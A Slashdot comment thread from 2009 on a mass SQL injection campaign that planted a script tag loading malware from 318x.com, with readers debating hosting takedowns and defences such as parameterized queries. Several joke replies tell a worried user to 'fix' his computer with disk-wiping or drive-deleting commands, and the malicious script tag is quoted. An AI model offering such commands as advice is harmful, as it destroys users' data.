SQL Injection Attack Claims 132,000+
An anonymous reader writes "A large scale SQL injection attack has injected a malicious iframe on tens of thousands of susceptible websites. ScanSafe reports that the injected iframe loads malicious content from 318x.com, which eventually leads to the installation of a rootkit-enabled variant of the Buzus backdoor trojan. A Google search on the iframe resulted in over 132,000 hits as of December 10, 2009."
hey (Score:3, Funny)
Hey, I went to 318x.com and all of a sudden my computer is acting funny. Any suggestions?
Re:hey (Score:5, Funny)
dd if=/dev/zero of=/dev/sda bs=8192 will fix it.
Re: (Score:3, Funny)
dd: opening `/dev/sda` failed: Permission denied.
Re: (Score:2)
Ok thanks, trying it no
CARRIER DISCONNECT
Re: (Score:2)
Yes, all that.
Re:hey (Score:4, Funny)
I actually post all my comments via a dead-man's-switch proxy that logs my keystrokes in real time and submits the post once it detects inactivity. This way I can type things like Candlejack and still publish my po
Re: (Score:2)
Re: (Score:2, Funny)
sudo dd if=/dev/zero of=/dev/sda bs=8192
Nope. Just says "Bad command or file name".
Re: (Score:2)
Re: (Score:2)
Uhhhhmmmm - does deltree still exist on Windows? It's been a long time since I used it. Somewhere along the line, I called it, and it didn't exist. Windows ME? Windows XP? I don't remember, but it wasn't there. Try rd or rmdir instead. http://en.wikipedia.org/wiki/Deltree [wikipedia.org]
Re: (Score:3, Informative)
That one is outdated. What he needs is "rd /s/q C:\".
Re: (Score:2, Funny)
"'dd' is not recognized as an internal or external command, operable program or batch file."
Still broken! =(
Posting AC so I don't get modded to hell by people who either don't think that was funny or are simply incapable of recognizing a joke.
Re: (Score:2)
on msdos / windows you have to enter: :)
echo format c: >dd.bat
before entering the dd command. It will work after that.
Re: (Score:2)
You forgot to add the /autotest so it won't ask it for anything.
Re: (Score:2)
The dude clearly doesn't run linux...
This is a system problem...
Delete c:\windows\system32
Didn't work. (Score:2)
C:\>dd if=/dev/zero of=/dev/sda bs=8192
'dd' is not recognized as an internal or external command,
operable program or batch file.
Now what? [grin]
Re: (Score:2)
Re: (Score:2)
I'm not sure what Cygwin does, exactly, but it manages to correctly spew out the first few sectors of my boot drive (including what looks like the MBR) when I do "dd if=/dev/sda", despite the fact that "ls /dev/" shows only fd, stdin, stdout and stderr.
So, with Cygwin installed, I can pwn myself with that command! Hurray!
Re: (Score:3, Insightful)
that's the point
it's not a security issue if you deliberately do something ignorant
like, say, using the internet
THE INTERNET IS NOT SECURE
says so right on the packaging, and always has
Re: (Score:2)
Re:hey (Score:5, Funny)
Call a comedy club and get your computer on stage?
Little Bobby Tables (Score:2, Funny)
318x.com (Score:2, Interesting)
After doing a whois, I see that just about all information is described as "Unknown"
Why is this domain still in existence? Can ICANN take it down?
It looks like the sole reason for this domain is for malware.
Re: (Score:3, Informative)
Re: (Score:2)
318x.com zone is now defined in my DNS so I don't have to update host files on each and every one of my computers.
Just kidding, but host files are so 1980 ;-))
Re: (Score:2)
I'm not familiar with any blemishes on ICANN's record of neutrality, but I, for one, wouldn't care to have my blog's domain erased because someone decided it was deemed harmful in some fashion.
why don't these go away? (Score:4, Interesting)
If they know where the site is that's hosting the payload why don't they just shut them down? I realize the locations for the hosting are carefully chosen to provide maximum insulation, but still you'd expect that by now (years after this sort of thing became common) that there'd be mechanisms and procedures in place to break these down swiftly?
Re: (Score:3, Insightful)
Re:why don't these go away? (Score:4, Insightful)
You are assuming that all the systems are hosted at reputable hosting companies that pro-actively monitor all their systems.
There are millions of systems worldwide that are exposed to the public internet (even though they probably shouldn't be) that are sitting in the corner somewhere waiting for someone to "get around to decommissioning them" - and in the meantime they're pumping out spam and taking part in DDoS attacks.
No... (Score:3, Interesting)
Re: (Score:2)
I think the sheer amount of shite in the form of worms, spam and DoS attacks continuing to flood the Internet kind of kills off that utopian vision, wouldn't you say?
Re: (Score:2)
Obviously, the suggestion is not implemented at all now.
Re: (Score:2)
The hosting company is irrelevant if the domain's NS records in the gtld-servers are pointed to nowhere. That won't help if the script uses the IP address, but in this case, it would kill it.
Where an IP address is used, null routing by an upstream provider can kill that IP. So the question stands, when the threat is this big, why is the site allowed to continue existing? Start at the colo provider/ISP and work up the chain until a reputable provider is found to null route the IP.
Re: (Score:2)
So the question stands, when the threat is this big, why is the site allowed to continue existing?
I don't know if you're bothering to test anything, but from where I stand 318x.com does not exist.
Re: (Score:3, Informative)
You must be new here, let me welcome you to "The Internet". I hope you enjoy your visit.
Hosting companies don't give a pair of fetid dingo's kidneys about such matters, so long as the people responsible for the hosting pay good money.
Even the hosting companies [softlayer.com] that claim [softlayer.com] to be anti-spam, and who's acceptable use policies state that ANY support of spam, including hosting spamvertized web sites [softlayer.com], when confronted with multiple, on-going violations [winehq.org], will ignore all reports, remove all forum posts calling attenti
Re: (Score:2)
Because linux sucks ass for games and is counterproductive to most users
and that's sooo important for those hosting web servers whose SQL is being hacked...
Re: (Score:2, Insightful)
No you're wrong. People attack Windows because the most people use it AND it is conveniently also less inherently secure than anything else in current production. If everyone stopped using Windows and switched to XYZ then XYZ would eventually become the new biggest target, that is true but it is just as completely naive to assume the same percentage of attacks would be successful on an entirely different platform as Windows as it is to assume that you would have a remotely accurate clue about what that ne
Re: (Score:2)
And you really want ICANN to "yank" a domain just because somebody who claims to be a security expert says it contains "bad stuff"?
Reminds me of xkcd (Score:3, Funny)
Re: (Score:2)
Details? (Score:4, Insightful)
I love the way they fail to mention what server systems might be effected. Is it SQL Server? MySQL? .NET? PHP? Windows servers? Linux? Both? What web sites are vulnerable?
It's always fun to snicker when you get to the registry entries which points to Windows. Although there was a trojan for Ubuntu in a desktop theme a few days ago, so enjoy the time to mock Windows users while it lasts.
Re:Details? (Score:5, Insightful)
But a Trojan needs user access and approval to get installed. No OS on the planet can protect itself from a user with the admin password.
Re:Details? (Score:5, Funny)
Windows 9x used to do a pretty good job, can't own a system once it's bluescreened.
Re: (Score:2)
Actually windows 9x did not have services, so there was less to hack into.
Re: (Score:2)
Re: (Score:2, Informative)
They didn't mention it because it doesn't matter. It's the result of bad coding practices. A SQL injection attack is caused by the front end application accepting whatever input it's given and using it to generate the SQL statements. You stop these attacks by sanitizing your input, using stored procedures to do the database work, and possibly sticking in a middleware tier to handle database access, i.e. apache -> websphere -> database.
Re: (Score:2)
parameterized inputs?
The only times I EVER pass a value as a concatenated string is if it goes along these lines..
try
query = "select [columns] from table where iTableID = " + Int64.Parse(strInput).ToString();
catch
^^
My lazy code. I only do internal utilities on side projects, so I can get away with this since these utilities are seldom used by anyone except when crap goes wrong. My primary job is SQL.
otherwise it's always the
string strSelectQry = "Select [columns] from schooltable where ischoolguid = @ischool";
Re: (Score:3, Informative)
They didn't mention it because it doesn't matter. Its the result of bad coding practices.
It does too matter. You don't infect 132,000 web sites with separate injection attacks. That's automated. A lot of the people running forums and CMS-driven web sites don't understand the code well enough to fix anything.
Heck, one of my sites was hacked once, through the forum software. I'm not in the habit of combing through forum code looking for unvalidated inputs. So if someone could mention what the parent e
Re: (Score:3, Insightful)
If it's really over 100,000 sites with the same attack then there's something obvious they have in common, like the same PHP/MYSQL library, and it has a predictable vulnerability in it.
Re:Details? (Score:5, Insightful)
Even still, this blog post is fucking useless. What CMS? What input is not being validated? Is it an underlying problem with Drupal? Wordpress? Joomla? What version?
On top of that, it doesn't give any recommendations for what end users could do to protect themselves. Does anti-virus software already detect it? Can you simply alter your hosts file? Disable Javascript?
The blog post is completely fucking useless.
Re: (Score:3, Informative)
according to TFA:
Malware description
Threatname: Backdoor.Win32.Buzus.croo
Aliases: Trojan-PWS.Win32.Lmir (Ikarus, a-squared); TR/Hijacker.Gen (AntiVir); Trojan/Win32.Buzus.gen (Antiy-AVL); W32/Agent.S.gen!Eldorado (F-Prot, Authentium); Win32:Rootkit-gen (Avast); Generic15.CBGO (AVG); Trojan.Generic.2823971 (BitDefender, GData); Trojan.Buzus.croo (Kaspersky, QuickHeal); Trojan.NtRootKit.2909 (DrWeb); Trj/Buzus.AH (Panda).
That's the trojan that's being installed by the exploits served up by the injected IFRAME. It is not the vulnerability that is allowing the IFRAME to be injected to begin with.
Re: (Score:2)
Probably the Asprox botnet. (Score:2)
Re: (Score:3, Informative)
I concur. Searching for the iframe script, this is what I found. Sorry if I can't say if it's something like DotNetNuke. The occasional ColdFusion page also has me wondering.
From the first page of a google search for "<script src=http://318x.com></script>":
City of Iowa City<script src=http://318x.com></script> - How to ... /default/templates/top2.asp, line 60.
Microsoft VBScript runtime error '800a000d'. Type mismatch: '[string: "1035<script src=http"]'.
www.icg
How is SQL involved? (Score:4, Interesting)
The article said "SQL" in the headline, but never mentioned it again after that.
Re: (Score:3, Interesting)
The article said "SQL" in the headline, but never mentioned it again after that.
My guess is that the compromised websites all have something in common, such as running the same CMS for example. You're right though, the article is short on details of the injection itself.
Re: (Score:2)
Re: (Score:2)
AFAIK there are two exploits:
On the users end there are several MS and Adobe scripting exploits being taken advantage of, all of which start inside the browser.
On the server end there is a SQL injection exploit being used to get the malicious code out there.
Re: (Score:2, Informative)
On the server end there is a SQL injection exploit being used to get the malicious code out there.
My point being that you don't need to do a SQL injection to do this.
To prevent a SQL injection, you need to change ' to '' on input from the user that you pass to sql.
To prevent an HTML+script injection, you need to change < to &lt;, > to &gt;, & to &amp; etc. on input from the user that renders to the browser. The sites in question are not doing this, hence, just stick the code you wish to inject into a comment or some other user field. This has nothing to do with SQL.
Re: (Score:2)
Mod parent up. The GP is way off the mark.
Re: (Score:2)
folder permissions.
The real problem (Score:2, Informative)
So it's MS and Adobe vulnerabilities that actually let the malware onto your system.
FTA:
Observed exploits include:
* Integer overflow vulnerability in Adobe Flash Player, described in CVE-2007-0071
* MDAC ADODB.Connection ActiveX vulnerability described in MS07-009
* Microsoft Office Web Components vulnerabilities described in MS09-043
* Microsoft video ActiveX vulnerability described in MS09-032
Re: (Score:2)
This is actually a stupid article, as it doesn't even bother to describe the platform which has the vulnerability in it. It's not a platform or database issue if it's a SQL Injection, so it must be some app that is common... like a CMS package or blog engine... something like that.
Bill
Re: (Score:2)
Which, of course, have already been addressed by the respective companies. Only unpatched systems would be affected.
In official packages of a Linux distribution, I would say that almost all would be patched so shouldn't be affected. But we are talking about the Windows world here. I'm not sure how automatic the updates for Flash Player are (just today got one in my Ubuntu box), Windows updates are known to add functionality (sometimes unwanted, so people could disable automatic updates after something "misbehaves"), and the MS fixes there probably aren't for IE6 (still used by 20% of the internet), maybe some for IE7 that is more
Re: (Score:2)
Which, of course, have already been addressed by the respective companies. Only unpatched systems would be affected.
Are you certain? I believe Flash might still have issues [foregroundsecurity.com], unless Adobe has figured out something to contradict their earlier statement that "...unfortunately, there is no easy solution. This issue is very difficult to solve without also breaking existing, legitimate content elsewhere on the web." Still, that report was a month ago, so maybe the situation has changed since then. I couldn't find anything to confirm or deny that current versions of Flash are still vulnerable -- does anyone else k
Re: (Score:2)
So the SQL injection which landed those vulnerabilities on 100+ thousand formerly trusted sites is not a real problem?
Obvious, but needs to be said (Score:4, Informative)
127.0.0.1 318x.com
And you should be safe, for the moment.
Don't worry, that site is slashdotted. (Score:2)
It's already under a huge DOS attack by the readers of Slashdot. There's no need to block it, in fact you should be attempting to load that page in concert with all the other members of the Slashbot.
Re: (Score:2)
safe until next week, when they use another address.
Checking inputs is the only fix.
Let's say it all together now... (Score:3, Interesting)
Re:Oblig (Score:2)
Exactly!
Obligatory [xkcd.com]
Re:Let's say it all together now... (Score:4, Informative)
validate your SQL inputs before posting them against an Internet-facing database.
Or simply use prepared statements (or whatever the equivalent term is in your language of choice). Prepared statements are far safer and easier than trying to validate all the current potential and future potential for breaking out of a SQL statement. It won't protect you from people putting in their own parameters into your SQL statement (like say someone elses userID), but that's a different class of vulnerability.
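The contrast drawn in this thread (string concatenation versus bound parameters, quote-doubling as the concatenation-era fix, and HTML escaping on output as the separate defence against the injected script tag) as an added example, not code from the article or from any commenter. It uses Python's built-in sqlite3 driver and a constructed two-row table; the payloads are the thread's own `'` and `<script src=http://318x.com></script>` examples. It also shows the single-statement-per-call behaviour discussed further down, since sqlite3 refuses stacked statements.

```python
import html
import sqlite3


def make_db():
    # Constructed sample data (not from the article): a tiny CMS-style table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.execute("INSERT INTO pages (title, body) VALUES ('home', 'Welcome')")
    conn.execute("INSERT INTO pages (title, body) VALUES ('about', 'About us')")
    conn.commit()
    return conn


def lookup_vulnerable(conn, title):
    # Concatenation: the user value becomes part of the SQL text, so a quote in
    # it ends the literal and the rest is parsed as SQL.
    sql = "SELECT body FROM pages WHERE title = '" + title + "' ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, title):
    # Prepared/parameterized statement: the driver binds the value separately;
    # it is never parsed as SQL, whatever characters it contains.
    sql = "SELECT body FROM pages WHERE title = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (title,))]


def quote_escaped(value):
    # The ' -> '' fix from the thread. It works for string literals in this
    # dialect but must be applied to every concatenated value, every time.
    return value.replace("'", "''")


def stacked_statement_accepted(conn, title):
    # Whether the interface would run a second statement smuggled in after a
    # ';'. sqlite3 rejects it, as the thread says PHP+MySQL does; other stacks
    # (the thread names SQL Server batches) would execute it.
    sql = "SELECT body FROM pages WHERE title = '" + title + "'"
    try:
        conn.execute(sql)
        return True
    except (sqlite3.ProgrammingError, sqlite3.Warning):
        return False


def render(body):
    # Output encoding for the browser: the separate defence against the
    # injected iframe/script tag, independent of how the row reached the DB.
    return "<p>" + html.escape(body) + "</p>"


if __name__ == "__main__":
    db = make_db()
    probe = "x' OR '1'='1"
    print(lookup_vulnerable(db, probe))        # every row leaks
    print(lookup_parameterized(db, probe))     # nothing: the value is just text
    print(lookup_vulnerable(db, quote_escaped(probe)))
    print(stacked_statement_accepted(db, "x'; SELECT 1; --"))
    print(render("<script src=http://318x.com></script>"))
```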
Terrible article, inappropriate headline (Score:3, Interesting)
The source of the attacks are servers who have been compromised through SQL injection. I get that. It's an important detail. They fail to identify what sites and/or what those sites are running that is exploitable in this way. Is it MySQL? Is it MS SQL? Oracle? Is it a particular software package running on a particular web host platform? The questions are too many and should have been answered in the article.
What is done after a server is compromised is pretty common. Microsoft components, especially those linked through ActiveX, have been not just a hole in Microsoft security, but a tunnel into the Windows kernel big enough to drive a truck through. A vulnerability in Adobe flash is only a a problem when it uses ActiveX to get there. Flash running in other ways does not seem to pose such an extreme threat otherwise. But while these are important security concerns to be aware of, it has nothing to do with the topic of the story as indicated by the headline or the first line of the story which is about compromised SERVERS, not about compromised clients.
132,000 hits on Google != 132,000 infections (Score:2)
I must disagree with the way they calculated infections. Counting the number of times something comes up on Google does not equal the number of infections.
Re: (Score:2)
If they search for the right string, then it should very closely approximate the number of compromised websites. The only other thing it should find are people talking about how to find the list of compromised websites.
132,000? Try 1269. (Score:2, Interesting)
As many have pointed out, the blog post does not offer sufficient detail, but does offer the rather sensational headline "SQL injection attack claims 132,000+". The Google Safe Browsing diagnostic page for 318x.com has it closer to 1200 or so:
http://google.com/safebrowsing/diagnostic?site=318x.com/
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, 318x.com appeared to function as an intermediary for the infection of 1202 site(s) including 37y.org/, jxa
SQL injections? Are those for H1N1? (Score:2, Funny)
"Claims 132,000+"??? (Score:2)
Block China ISP blocks. (Score:2)
These are again Chinese based servers.
http://google.com/safebrowsing/diagnostic?site=318x.com/ [google.com]
Re: (Score:2)
It looks like most of the sites showing up infected in Google are almost overwhelmingly in China or Chinese language. This one has been circulating for a while.
Is everybody at risk? (Score:2)
I have one Mac laptop and one Linux laptop. Will the rootkit be a problem for me?
correction (Score:2, Troll)
Doesn't say what systems are affected by this SQL Injection.
All I can tell (from TFA), is it affects Windows
Fixed. Need coffee.
Re:Windoze (Score:5, Informative)
All I can tell (from TFA), is it affects Windows servers.
SQL injection attacks affect any number of platforms. It's not a Windows problem, it's not a database problem, it's a "we hired cheap, unskilled developers" problem.
Now the people who browse these sites and get hit with malware, that looks to be specific to Windows.
Re: (Score:3, Informative)
Now the people who browse these sites and get hit with malware, that looks to be specific to Windows.
Yeah. I saw my error after I had posted it, so I tried to correct it with a follow up.
Re: (Score:2)
What really amazes me is how easy it is to avoid SQL injection attacks. You don't have to be a security genius. Use PreparedStatements in Java (or their equivalent in other languages). Problem solved.
Re: (Score:2, Informative)
Only easy when using sane languages.
But it used to be very difficult to do the right thing with PHP.
The PHP developers were either incompetent or malicious. Evidence: they created insane stuff like addslashes, magic_quotes and even mysql_real_escape_string.
See: http://php.net/manual/en/function.mysql-real-escape-string.php [php.net]
Fortunately they eventually introduced stuff like PDO (but there was some confusion in the days of PEAR::DB).
And we didn't get stuff like "mysql_definitely_the_real_escape_string_now_no_re
Re: (Score:2)
<cfquery name="getId" datasource="somedb">
SELECT id
FROM users
WHERE login = <cfqueryparam value="#login#" cfsqltype="cf_sql_varchar">
</cfquery>
Re:ColdFusion dynamic SQL interface (Score:2)
Unless you have a driver that is seriously deficient, you can leave out the cfsqltype="cf_sql_varchar" part.
Many dynamic SQL interfaces are at least as verbose, due to the requirement to bind all the parameters. And good luck if you have to count question marks to get your parameter bindings in the right order, as in PHP, ODBC, JDBC etc.
Precompiler interfaces are the best, but who uses precompilers any more? Or you could just write as much as possible using stored procedures, but that has its own unique fo
Re: (Score:2)
Argh. That is as if XML and SQL had a kid and it was ugly as fuck. :(
Re: (Score:2)
As it is, lots of PHP hosting sites will either be prone to SQL injection, or prone to data corruption (or both), and be a pain to people (like you) trying to get things safe and working correctly.
The right way of doing things is: you filter inputs to your program so that your program can cope with the data, THEN your program has different filters for each output from your program to a different
Re: (Score:2)
prepared statements. Damn it. I actually read that as "preparation H" the first time.
Now, I'm wondering if preparation H might be the right fix for a Windows machine......
Re: (Score:3, Insightful)
Re: (Score:2)
Because of the interface between the server language and the database, not all SQL injection attacks will work on just any setup. The connection between PHP and MySQL, for example, will only execute a single query at a time. SQL Server, for example, will allow you to separate queries with a semicolon and send an entire batch.
Re:SQL injection portability (Score:3, Informative)
For various reasons, an SQL injection generally targets a specific application running on a specific database. Unless your database interface is seriously deficient, like MS SQL server, it is difficult to perform a successful SQL injection without knowing what the table structure is. And of course, most applications do not run on multiple database types.
Re: (Score:2)
Uhhhhh, you really RTFA? It doesn't matter what the server is running to get compromised by an SQL injection, does it? Could be MySQL running on a RedHat server. Could be SQL Server running on a Windows server. Why would an SQL injection be platform-dependent? After all, isn't that why SQL is ANSI and _relatively_ portable between platforms? I did say "relatively" of course ::rollseyes::
Except when the attack depends on multi-statement lines separated by a ; and a specific meta table to
Re: (Score:2)
Re: (Score:2)
Re: (Score:2)
Re: (Score:3, Insightful)
Re: (Score:3, Insightful)
You don't need stored procedures, all you need are parametrized statements/commands, so long as your API provides it. And plain ADO, which was used with classic ASP, did provide parametrized commands.
Any attempt to defeat SQL injection by blacklisting syntax is inherently error-prone if only because it may break on a future version of database (when its syntax gets extended). Not to mention that, unless you have perfect knowledge of 100% of the SQL dialect that your implementation uses, you may forget to bl